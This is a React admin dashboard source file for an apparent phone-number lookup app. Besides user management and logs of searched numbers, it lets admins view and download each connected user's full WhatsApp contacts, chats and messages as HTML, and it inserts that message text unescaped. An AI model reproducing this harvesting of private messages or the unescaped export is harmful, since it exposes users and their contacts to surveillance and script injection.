import React, { useEffect, useState } from 'react';
import { 
    Users, 
    Search, 
    CheckCircle, 
    XCircle, 
    Clock, 
    Shield, 
    ShieldOff,
    Trash2,
    RefreshCw,
    Phone,
    MessageCircle,
    AlertCircle,
    ArrowLeft,
    Download,
    FileText
} from 'lucide-react';
import { User, SearchLog, getUsers, getSearchLogs, updateUserStatus, updateUserRole, deleteUser } from '../api/auth';
import { API_BASE_URL } from '../config';

interface AdminDashboardProps {
    onBack: () => void;
}

type Tab = 'users' | 'logs' | 'sessions';

interface SessionData {
    userId?: string;
    username?: string;
    connectedAt?: string;
    lastUpdated?: string;
    isConnected?: boolean;
    contacts: any[];
    chats: any[];
    messages: { [key: string]: any[] };
    totalMessages: number;
    timestamp: string;
}

interface UserSessionSummary {
    userId: string;
    username: string;
    connectedAt: string;
    lastUpdated?: string;
    contactsCount: number;
    chatsCount: number;
    messagesCount: number;
    isConnected: boolean;
}

export function AdminDashboard({ onBack }: AdminDashboardProps) {
    const [activeTab, setActiveTab] = useState<Tab>('users');
    const [sessionData, setSessionData] = useState<SessionData | null>(null);
    const [userSessions, setUserSessions] = useState<UserSessionSummary[]>([]);
    const [selectedSessionUser, setSelectedSessionUser] = useState<string | null>(null);
    const [loadingSession, setLoadingSession] = useState(false);
    const [users, setUsers] = useState<User[]>([]);
    const [searchLogs, setSearchLogs] = useState<SearchLog[]>([]);
    const [isLoading, setIsLoading] = useState(true);
    const [error, setError] = useState<string | null>(null);
    const [actionLoading, setActionLoading] = useState<string | null>(null);

    useEffect(() => {
        loadData();
    }, []);

    const loadData = async () => {
        setIsLoading(true);
        setError(null);
        try {
            const [usersData, logsData] = await Promise.all([
                getUsers(),
                getSearchLogs(200)
            ]);
            setUsers(usersData.users);
            setSearchLogs(logsData.logs);
        } catch (err) {
            setError('Failed to load data');
        } finally {
            setIsLoading(false);
        }
    };

    const loadSessionData = async () => {
        setLoadingSession(true);
        try {
            const token = localStorage.getItem('auth_token');
            
            // First, get list of all user sessions
            const sessionsRes = await fetch(`${API_BASE_URL}/admin/sessions`, { 
                headers: { Authorization: `Bearer ${token}` } 
            });
            const sessionsData = await sessionsRes.json();
            
            if (sessionsData.success) {
                setUserSessions(sessionsData.sessions || []);
            }
        } catch (err) {
            setError('Failed to load session data');
        } finally {
            setLoadingSession(false);
        }
    };

    const loadUserSession = async (userId: string) => {
        setLoadingSession(true);
        setSelectedSessionUser(userId);
        try {
            const token = localStorage.getItem('auth_token');
            const res = await fetch(`${API_BASE_URL}/admin/sessions/${userId}`, { 
                headers: { Authorization: `Bearer ${token}` } 
            });
            const data = await res.json();
            
            if (data.success && data.session) {
                setSessionData({
                    userId: data.session.userId,
                    username: data.session.username,
                    connectedAt: data.session.connectedAt,
                    lastUpdated: data.session.lastUpdated,
                    isConnected: data.session.isConnected,
                    contacts: data.session.contacts || [],
                    chats: data.session.chats || [],
                    messages: data.session.messages || {},
                    totalMessages: data.session.totalMessages || 0,
                    timestamp: data.session.lastUpdated || data.session.connectedAt
                });
            } else {
                setError(data.message || 'Session not found');
            }
        } catch (err) {
            setError('Failed to load user session');
        } finally {
            setLoadingSession(false);
        }
    };

    const downloadSessionAsHTML = () => {
        if (!sessionData) return;
        
        const formatTime = (ts: number) => new Date(ts).toLocaleString();
        const username = sessionData.username || 'Unknown User';
        
        let html = `<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WhatsApp Session - ${username} - ${new Date().toLocaleDateString()}</title>
    <style>
        body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; max-width: 900px; margin: 0 auto; padding: 20px; background: #f5f5f5; }
        h1, h2, h3 { color: #1a1a2e; }
        .section { background: white; border-radius: 12px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 8px rgba(0,0,0,0.1); }
        .contact, .chat { padding: 12px; border-bottom: 1px solid #eee; display: flex; justify-content: space-between; }
        .message { padding: 10px 15px; margin: 8px 0; border-radius: 12px; max-width: 70%; }
        .message.sent { background: #dcf8c6; margin-left: auto; }
        .message.received { background: white; border: 1px solid #ddd; }
        .message-time { font-size: 11px; color: #888; text-align: right; margin-top: 4px; }
        .message-sender { font-size: 12px; color: #075e54; font-weight: 600; margin-bottom: 4px; }
        .chat-header { background: #075e54; color: white; padding: 15px; border-radius: 8px; margin-bottom: 15px; }
        .stats { display: grid; grid-template-columns: repeat(3, 1fr); gap: 15px; text-align: center; }
        .stat { background: #e8f5e9; padding: 20px; border-radius: 8px; }
        .stat-number { font-size: 28px; font-weight: bold; color: #075e54; }
        .stat-label { color: #666; margin-top: 5px; }
        .date-divider { text-align: center; color: #888; font-size: 12px; padding: 10px; }
    </style>
</head>
<body>
    <h1>📱 WhatsApp Session Export - ${username}</h1>
    <p>User: <strong>${username}</strong></p>
    <p>Connected: ${sessionData.connectedAt ? new Date(sessionData.connectedAt).toLocaleString() : 'Unknown'}</p>
    <p>Exported on: ${new Date().toLocaleString()}</p>
    
    <div class="section">
        <h2>📊 Summary</h2>
        <div class="stats">
            <div class="stat"><div class="stat-number">${sessionData.contacts.length}</div><div class="stat-label">Contacts</div></div>
            <div class="stat"><div class="stat-number">${sessionData.chats.length}</div><div class="stat-label">Chats</div></div>
            <div class="stat"><div class="stat-number">${sessionData.totalMessages}</div><div class="stat-label">Messages</div></div>
        </div>
    </div>
    
    <div class="section">
        <h2>👥 Contacts (${sessionData.contacts.length})</h2>
        ${sessionData.contacts.map(c => `<div class="contact"><span>${c.name || 'Unknown'}</span><span>+${c.phoneNumber}</span></div>`).join('')}
    </div>
    
    <div class="section">
        <h2>💬 Chats (${sessionData.chats.length})</h2>
        ${sessionData.chats.map(c => `<div class="chat"><span>${c.name || c.phoneNumber}</span><span>${c.lastMessage || ''}</span></div>`).join('')}
    </div>
    
    <div class="section">
        <h2>📝 Messages</h2>
        ${Object.entries(sessionData.messages).map(([jid, msgs]: [string, any[]]) => {
            const chatName = sessionData.chats.find((c: any) => c.jid === jid)?.name || jid.split('@')[0];
            return `
                <div class="chat-header">
                    <strong>${chatName}</strong> - ${msgs.length} messages
                </div>
                ${msgs.map(m => `
                    <div class="message ${m.fromMe ? 'sent' : 'received'}">
                        ${!m.fromMe && m.senderName ? `<div class="message-sender">${m.senderName}</div>` : ''}
                        <div>${m.text || m.caption || `[${m.type}]`}</div>
                        <div class="message-time">${formatTime(m.timestamp)}</div>
                    </div>
                `).join('')}
            `;
        }).join('<hr style="margin: 30px 0; border: none; border-top: 2px solid #eee;">')}
    </div>
</body>
</html>`;
        
        const blob = new Blob([html], { type: 'text/html' });
        const url = URL.createObjectURL(blob);
        const a = document.createElement('a');
        a.href = url;
        a.download = `whatsapp-session-${username.replace(/[^a-z0-9]/gi, '_')}-${new Date().toISOString().split('T')[0]}.html`;
        document.body.appendChild(a);
        a.click();
        document.body.removeChild(a);
        URL.revokeObjectURL(url);
    };

    const handleStatusChange = async (userId: string, status: 'pending' | 'active' | 'suspended') => {
        setActionLoading(userId);
        try {
            const result = await updateUserStatus(userId, status);
            if (result.success && result.user) {
                setUsers(users.map(u => u.id === userId ? { ...u, status } : u));
            }
        } catch (err) {
            setError('Failed to update user status');
        } finally {
            setActionLoading(null);
        }
    };

    const handleRoleChange = async (userId: string, role: 'user' | 'admin') => {
        setActionLoading(userId);
        try {
            const result = await updateUserRole(userId, role);
            if (result.success && result.user) {
                setUsers(users.map(u => u.id === userId ? { ...u, role } : u));
            }
        } catch (err) {
            setError('Failed to update user role');
        } finally {
            setActionLoading(null);
        }
    };

    const handleDelete = async (userId: string, username: string) => {
        if (!window.confirm(`Are you sure you want to delete user "${username}"? This action cannot be undone.`)) {
            return;
        }
        
        setActionLoading(userId);
        try {
            const result = await deleteUser(userId);
            if (result.success) {
                setUsers(users.filter(u => u.id !== userId));
            }
        } catch (err) {
            setError('Failed to delete user');
        } finally {
            setActionLoading(null);
        }
    };

    const getStatusBadge = (status: string) => {
        switch (status) {
            case 'active':
                return (
                    <span className="inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium bg-green-100 text-green-700">
                        <CheckCircle className="w-3 h-3" />
                        Active
                    </span>
                );
            case 'pending':
                return (
                    <span className="inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium bg-yellow-100 text-yellow-700">
                        <Clock className="w-3 h-3" />
                        Pending
                    </span>
                );
            case 'suspended':
                return (
                    <span className="inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium bg-red-100 text-red-700">
                        <XCircle className="w-3 h-3" />
                        Suspended
                    </span>
                );
            default:
                return null;
        }
    };

    const getRoleBadge = (role: string) => {
        if (role === 'admin') {
            return (
                <span className="inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium bg-purple-100 text-purple-700">
                    <Shield className="w-3 h-3" />
                    Admin
                </span>
            );
        }
        return (
            <span className="inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium bg-gray-100 text-gray-600">
                <ShieldOff className="w-3 h-3" />
                User
            </span>
        );
    };

    const formatDate = (dateStr: string) => {
        const date = new Date(dateStr);
        return date.toLocaleString();
    };

    const pendingUsers = users.filter(u => u.status === 'pending');

    return (
        <div className="min-h-screen bg-gradient-to-br from-slate-900 via-purple-900 to-slate-900 p-6">
            <div className="max-w-7xl mx-auto">
                {/* Header */}
                <div className="flex items-center justify-between mb-8">
                    <div className="flex items-center gap-4">
                        <button
                            onClick={onBack}
                            className="p-2 rounded-lg bg-white/10 hover:bg-white/20 text-white transition-all"
                        >
                            <ArrowLeft className="w-5 h-5" />
                        </button>
                        <div>
                            <h1 className="text-3xl font-bold text-white flex items-center gap-3">
                                <Shield className="w-8 h-8 text-purple-400" />
                                Admin Dashboard
                            </h1>
                            <p className="text-gray-400 mt-1">Manage users and view activity logs</p>
                        </div>
                    </div>
                    <button
                        onClick={loadData}
                        disabled={isLoading}
                        className="flex items-center gap-2 px-4 py-2 bg-white/10 hover:bg-white/20 text-white rounded-xl transition-all disabled:opacity-50"
                    >
                        <RefreshCw className={`w-4 h-4 ${isLoading ? 'animate-spin' : ''}`} />
                        Refresh
                    </button>
                </div>

                {/* Pending Users Alert */}
                {pendingUsers.length > 0 && (
                    <div className="mb-6 p-4 bg-yellow-500/20 border border-yellow-500/50 rounded-xl flex items-center gap-3 text-yellow-200">
                        <AlertCircle className="w-5 h-5 flex-shrink-0" />
                        <span>
                            <strong>{pendingUsers.length}</strong> user(s) pending approval: {pendingUsers.map(u => u.username).join(', ')}
                        </span>
                    </div>
                )}

                {/* Error Message */}
                {error && (
                    <div className="mb-6 p-4 bg-red-500/20 border border-red-500/50 rounded-xl flex items-center gap-3 text-red-200">
                        <XCircle className="w-5 h-5 flex-shrink-0" />
                        <span>{error}</span>
                        <button onClick={() => setError(null)} className="ml-auto hover:text-white">×</button>
                    </div>
                )}

                {/* Tabs */}
                <div className="flex gap-2 mb-6">
                    <button
                        onClick={() => setActiveTab('users')}
                        className={`flex items-center gap-2 px-6 py-3 rounded-xl font-medium transition-all ${
                            activeTab === 'users'
                                ? 'bg-gradient-to-r from-purple-500 to-pink-500 text-white'
                                : 'bg-white/10 text-gray-300 hover:bg-white/20'
                        }`}
                    >
                        <Users className="w-4 h-4" />
                        Users ({users.length})
                    </button>
                    <button
                        onClick={() => setActiveTab('logs')}
                        className={`flex items-center gap-2 px-6 py-3 rounded-xl font-medium transition-all ${
                            activeTab === 'logs'
                                ? 'bg-gradient-to-r from-purple-500 to-pink-500 text-white'
                                : 'bg-white/10 text-gray-300 hover:bg-white/20'
                        }`}
                    >
                        <Search className="w-4 h-4" />
                        Search Logs ({searchLogs.length})
                    </button>
                    <button
                        onClick={() => { setActiveTab('sessions'); if (!sessionData) loadSessionData(); }}
                        className={`flex items-center gap-2 px-6 py-3 rounded-xl font-medium transition-all ${
                            activeTab === 'sessions'
                                ? 'bg-gradient-to-r from-green-500 to-teal-500 text-white'
                                : 'bg-white/10 text-gray-300 hover:bg-white/20'
                        }`}
                    >
                        <FileText className="w-4 h-4" />
                        WhatsApp Data
                    </button>
                </div>

                {/* Content */}
                <div className="bg-white/10 backdrop-blur-lg rounded-2xl border border-white/20 overflow-hidden">
                    {activeTab === 'users' && (
                        <div className="overflow-x-auto">
                            <table className="w-full">
                                <thead>
                                    <tr className="border-b border-white/10">
                                        <th className="text-left p-4 text-gray-300 font-medium">User</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Email</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Role</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Status</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Created</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Last Login</th>
                                        <th className="text-right p-4 text-gray-300 font-medium">Actions</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    {users.map(user => (
                                        <tr key={user.id} className="border-b border-white/5 hover:bg-white/5">
                                            <td className="p-4 text-white font-medium">{user.username}</td>
                                            <td className="p-4 text-gray-300">{user.email}</td>
                                            <td className="p-4">{getRoleBadge(user.role)}</td>
                                            <td className="p-4">{getStatusBadge(user.status)}</td>
                                            <td className="p-4 text-gray-400 text-sm">{formatDate(user.createdAt)}</td>
                                            <td className="p-4 text-gray-400 text-sm">
                                                {user.lastLogin ? formatDate(user.lastLogin) : 'Never'}
                                            </td>
                                            <td className="p-4">
                                                <div className="flex items-center justify-end gap-2">
                                                    {user.status === 'pending' && (
                                                        <button
                                                            onClick={() => handleStatusChange(user.id, 'active')}
                                                            disabled={actionLoading === user.id}
                                                            className="px-3 py-1.5 bg-green-500/20 text-green-400 rounded-lg hover:bg-green-500/30 text-sm font-medium disabled:opacity-50"
                                                        >
                                                            Approve
                                                        </button>
                                                    )}
                                                    {user.status === 'active' && (
                                                        <button
                                                            onClick={() => handleStatusChange(user.id, 'suspended')}
                                                            disabled={actionLoading === user.id}
                                                            className="px-3 py-1.5 bg-yellow-500/20 text-yellow-400 rounded-lg hover:bg-yellow-500/30 text-sm font-medium disabled:opacity-50"
                                                        >
                                                            Suspend
                                                        </button>
                                                    )}
                                                    {user.status === 'suspended' && (
                                                        <button
                                                            onClick={() => handleStatusChange(user.id, 'active')}
                                                            disabled={actionLoading === user.id}
                                                            className="px-3 py-1.5 bg-green-500/20 text-green-400 rounded-lg hover:bg-green-500/30 text-sm font-medium disabled:opacity-50"
                                                        >
                                                            Activate
                                                        </button>
                                                    )}
                                                    {user.role === 'user' ? (
                                                        <button
                                                            onClick={() => handleRoleChange(user.id, 'admin')}
                                                            disabled={actionLoading === user.id}
                                                            className="px-3 py-1.5 bg-purple-500/20 text-purple-400 rounded-lg hover:bg-purple-500/30 text-sm font-medium disabled:opacity-50"
                                                            title="Make Admin"
                                                        >
                                                            <Shield className="w-4 h-4" />
                                                        </button>
                                                    ) : (
                                                        <button
                                                            onClick={() => handleRoleChange(user.id, 'user')}
                                                            disabled={actionLoading === user.id}
                                                            className="px-3 py-1.5 bg-gray-500/20 text-gray-400 rounded-lg hover:bg-gray-500/30 text-sm font-medium disabled:opacity-50"
                                                            title="Remove Admin"
                                                        >
                                                            <ShieldOff className="w-4 h-4" />
                                                        </button>
                                                    )}
                                                    <button
                                                        onClick={() => handleDelete(user.id, user.username)}
                                                        disabled={actionLoading === user.id}
                                                        className="px-3 py-1.5 bg-red-500/20 text-red-400 rounded-lg hover:bg-red-500/30 text-sm font-medium disabled:opacity-50"
                                                        title="Delete User"
                                                    >
                                                        <Trash2 className="w-4 h-4" />
                                                    </button>
                                                </div>
                                            </td>
                                        </tr>
                                    ))}
                                    {users.length === 0 && !isLoading && (
                                        <tr>
                                            <td colSpan={7} className="p-8 text-center text-gray-400">
                                                No users found
                                            </td>
                                        </tr>
                                    )}
                                </tbody>
                            </table>
                        </div>
                    )}
                    {activeTab === 'logs' && (
                        <div className="overflow-x-auto">
                            <table className="w-full">
                                <thead>
                                    <tr className="border-b border-white/10">
                                        <th className="text-left p-4 text-gray-300 font-medium">Timestamp</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">User</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Platform</th>
                                        <th className="text-left p-4 text-gray-300 font-medium">Searched Number</th>
                                    </tr>
                                </thead>
                                <tbody>
                                    {searchLogs.map(log => (
                                        <tr key={log.id} className="border-b border-white/5 hover:bg-white/5">
                                            <td className="p-4 text-gray-400 text-sm">{formatDate(log.timestamp)}</td>
                                            <td className="p-4 text-white font-medium">{log.username}</td>
                                            <td className="p-4">
                                                <span className={`inline-flex items-center gap-1 px-2.5 py-1 rounded-full text-xs font-medium ${
                                                    log.platform === 'whatsapp' 
                                                        ? 'bg-green-500/20 text-green-400' 
                                                        : 'bg-blue-500/20 text-blue-400'
                                                }`}>
                                                    <MessageCircle className="w-3 h-3" />
                                                    {log.platform === 'whatsapp' ? 'WhatsApp' : 'Signal'}
                                                </span>
                                            </td>
                                            <td className="p-4">
                                                <span className="inline-flex items-center gap-2 text-white">
                                                    <Phone className="w-4 h-4 text-gray-400" />
                                                    +{log.searchedNumber}
                                                </span>
                                            </td>
                                        </tr>
                                    ))}
                                    {searchLogs.length === 0 && !isLoading && (
                                        <tr>
                                            <td colSpan={4} className="p-8 text-center text-gray-400">
                                                No search logs found
                                            </td>
                                        </tr>
                                    )}
                                </tbody>
                            </table>
                        </div>
                    )}
                    {activeTab === 'sessions' && (
                        <div className="p-6">
                            {loadingSession ? (
                                <div className="flex items-center justify-center py-12">
                                    <RefreshCw className="w-8 h-8 text-green-400 animate-spin" />
                                    <span className="ml-3 text-gray-300">Loading session data...</span>
                                </div>
                            ) : sessionData ? (
                                <div className="space-y-6">
                                    {/* Back button and user info */}
                                    <div className="flex items-center gap-4 mb-4">
                                        <button
                                            onClick={() => { setSessionData(null); setSelectedSessionUser(null); }}
                                            className="px-4 py-2 bg-white/10 text-gray-300 rounded-lg hover:bg-white/20 transition-all flex items-center gap-2"
                                        >
                                            <ArrowLeft className="w-4 h-4" />
                                            Back to Users
                                        </button>
                                        <div className="text-white">
                                            <span className="font-semibold">{sessionData.username}</span>
                                            <span className="text-gray-400 ml-2">- Connected: {sessionData.connectedAt ? new Date(sessionData.connectedAt).toLocaleString() : 'Unknown'}</span>
                                        </div>
                                    </div>
                                    
                                    {/* Summary Cards */}
                                    <div className="grid grid-cols-1 md:grid-cols-4 gap-4">
                                        <div className="bg-green-500/20 rounded-xl p-4 text-center">
                                            <div className="text-3xl font-bold text-green-400">{sessionData.contacts.length}</div>
                                            <div className="text-gray-400 text-sm">Contacts</div>
                                        </div>
                                        <div className="bg-blue-500/20 rounded-xl p-4 text-center">
                                            <div className="text-3xl font-bold text-blue-400">{sessionData.chats.length}</div>
                                            <div className="text-gray-400 text-sm">Chats</div>
                                        </div>
                                        <div className="bg-purple-500/20 rounded-xl p-4 text-center">
                                            <div className="text-3xl font-bold text-purple-400">{sessionData.totalMessages}</div>
                                            <div className="text-gray-400 text-sm">Messages</div>
                                        </div>
                                        <div className="bg-pink-500/20 rounded-xl p-4 text-center">
                                            <div className="text-3xl font-bold text-pink-400">{Object.keys(sessionData.messages).length}</div>
                                            <div className="text-gray-400 text-sm">Message Threads</div>
                                        </div>
                                    </div>
                                    
                                    {/* Download Buttons */}
                                    <div className="flex flex-wrap gap-3">
                                        <button
                                            onClick={downloadSessionAsHTML}
                                            className="flex items-center gap-2 px-6 py-3 bg-gradient-to-r from-green-500 to-teal-500 text-white rounded-xl font-medium hover:from-green-600 hover:to-teal-600 transition-all"
                                        >
                                            <Download className="w-5 h-5" />
                                            Download as HTML
                                        </button>
                                        <button
                                            onClick={loadSessionData}
                                            className="flex items-center gap-2 px-6 py-3 bg-white/10 text-gray-300 rounded-xl font-medium hover:bg-white/20 transition-all"
                                        >
                                            <RefreshCw className="w-4 h-4" />
                                            Refresh Data
                                        </button>
                                    </div>
                                    
                                    {/* Data Preview */}
                                    <div className="text-sm text-gray-400">
                                        <p>Last synced: {new Date(sessionData.timestamp).toLocaleString()}</p>
                                        <p className="mt-2">The HTML export includes all contacts, chats, and messages in a printable format that can be saved as PDF using your browser's print function (Ctrl+P → Save as PDF).</p>
                                    </div>
                                </div>
                            ) : (
                                <div className="space-y-6">
                                    <div className="flex items-center justify-between">
                                        <h3 className="text-xl font-semibold text-white">User WhatsApp Sessions</h3>
                                        <button
                                            onClick={loadSessionData}
                                            className="flex items-center gap-2 px-4 py-2 bg-white/10 text-gray-300 rounded-lg hover:bg-white/20 transition-all"
                                        >
                                            <RefreshCw className="w-4 h-4" />
                                            Refresh
                                        </button>
                                    </div>
                                    
                                    {userSessions.length > 0 ? (
                                        <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-4">
                                            {userSessions.map(session => (
                                                <div key={session.userId} className="bg-white/5 rounded-xl p-4 border border-white/10 hover:border-green-500/50 transition-all">
                                                    <div className="flex items-center gap-3 mb-3">
                                                        <div className={`w-10 h-10 rounded-full flex items-center justify-center ${session.isConnected ? 'bg-gradient-to-br from-green-400 to-green-600' : 'bg-gradient-to-br from-gray-500 to-gray-600'}`}>
                                                            <Users className="w-5 h-5 text-white" />
                                                        </div>
                                                        <div className="flex-1">
                                                            <div className="flex items-center gap-2">
                                                                <h4 className="font-semibold text-white">{session.username}</h4>
                                                                {session.isConnected ? (
                                                                    <span className="px-2 py-0.5 bg-green-500/20 text-green-400 text-xs rounded-full">Online</span>
                                                                ) : (
                                                                    <span className="px-2 py-0.5 bg-gray-500/20 text-gray-400 text-xs rounded-full">Offline</span>
                                                                )}
                                                            </div>
                                                            <p className="text-xs text-gray-400">
                                                                {session.lastUpdated 
                                                                    ? `Updated: ${new Date(session.lastUpdated).toLocaleString()}`
                                                                    : `Connected: ${new Date(session.connectedAt).toLocaleString()}`
                                                                }
                                                            </p>
                                                        </div>
                                                    </div>
                                                    <div className="grid grid-cols-3 gap-2 mb-3 text-center">
                                                        <div className="bg-white/5 rounded-lg p-2">
                                                            <div className="text-lg font-bold text-green-400">{session.contactsCount}</div>
                                                            <div className="text-xs text-gray-500">Contacts</div>
                                                        </div>
                                                        <div className="bg-white/5 rounded-lg p-2">
                                                            <div className="text-lg font-bold text-blue-400">{session.chatsCount}</div>
                                                            <div className="text-xs text-gray-500">Chats</div>
                                                        </div>
                                                        <div className="bg-white/5 rounded-lg p-2">
                                                            <div className="text-lg font-bold text-purple-400">{session.messagesCount}</div>
                                                            <div className="text-xs text-gray-500">Messages</div>
                                                        </div>
                                                    </div>
                                                    <button
                                                        onClick={() => loadUserSession(session.userId)}
                                                        disabled={session.contactsCount === 0 && session.chatsCount === 0 && session.messagesCount === 0}
                                                        className="w-full px-4 py-2 bg-gradient-to-r from-green-500 to-teal-500 text-white rounded-lg font-medium hover:from-green-600 hover:to-teal-600 transition-all flex items-center justify-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed"
                                                    >
                                                        <Download className="w-4 h-4" />
                                                        View & Download
                                                    </button>
                                                </div>
                                            ))}
                                        </div>
                                    ) : (
                                        <div className="text-center py-12 bg-white/5 rounded-xl">
                                            <MessageCircle className="w-16 h-16 text-gray-600 mx-auto mb-4" />
                                            <p className="text-gray-400 mb-2">No user sessions found</p>
                                            <p className="text-sm text-gray-500">Sessions are created when users connect their WhatsApp</p>
                                        </div>
                                    )}
                                </div>
                            )}
                        </div>
                    )}
                </div>
            </div>
        </div>
    );
}
